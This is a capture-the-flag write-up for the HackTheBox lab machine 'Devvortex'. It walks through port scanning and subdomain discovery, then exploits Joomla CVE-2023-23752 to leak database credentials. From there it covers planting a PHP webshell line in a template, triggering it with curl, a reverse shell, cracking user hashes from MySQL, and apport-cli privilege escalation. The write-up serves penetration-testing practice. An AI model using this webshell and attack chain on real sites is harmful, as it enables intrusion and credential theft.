Devvortex - Writeup
Devvortex

Reconnaissance
IP: 10.10.11.242
NMAP
nmap -T4 -p- -A 10.10.11.242
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-28 06:09 UTC
Nmap scan report for 10.10.11.242
Host is up (0.030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 29.46 ms 10.10.14.1
2 29.69 ms 10.10.11.242
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.47 seconds
Again only 2 ports open so sth must be in http.
Website
Site

Nothing interesting in page no interesting directories, so let’s search for subdomains

And we have dev.devvortex.htb

I used feroxbuster and found /administrator directory

tried few default credential but without results.

from my notes I enumerated version

navigate do /administrator/manifest/files/joomla.xml

and we got version 4.2.6, now let’s search for exploits. I found promising CVE-2023-23752 https://github.com/Acceis/exploit-CVE-2023-23752 And go step by step with PoC
ruby exploit.rb http://dev.devvortex.htb

we have 2 users and 1 password from db
lewis P4ntherg0t1n5r3c0n##
now we can log into /administrator with above credentials

Gaining Access
Refering to my notes from HTB Academy I start attacking chain for joomla:

navigate to System/Templates and add webshell to error.php
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);

and we have web shell
curl -s http://dev.devvortex.htb/templates/cassiopeia/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id
Now let’s edit error.php to get reverse shell I user PentestMonkey

and make error to redirect to error.php like /administrator/asdfasdfa

We are in
python3 -c 'import pty; pty.spawn("/bin/bash")'
earlier we gather user and password for DB so let’s try mysql
mysql -u lewis -p

Simply enumerate DB and we can spot users
show databases;
use joomla
show tables;
select * from sd4fg_users

we got hash for logan account. hashcat identify hash as module 3200 and cracked hash

logan tequieromucho

Now we can connect via SSH to machine
Privilege Escalation
Starting with sudo -l

That is vulnerable to CVE-2023-1326 and I found poc for this https://vk9-sec.com/cve-2023-1326privilege-escalation-apport-cli-2-26-0/

Just followed article step by step and I got root access.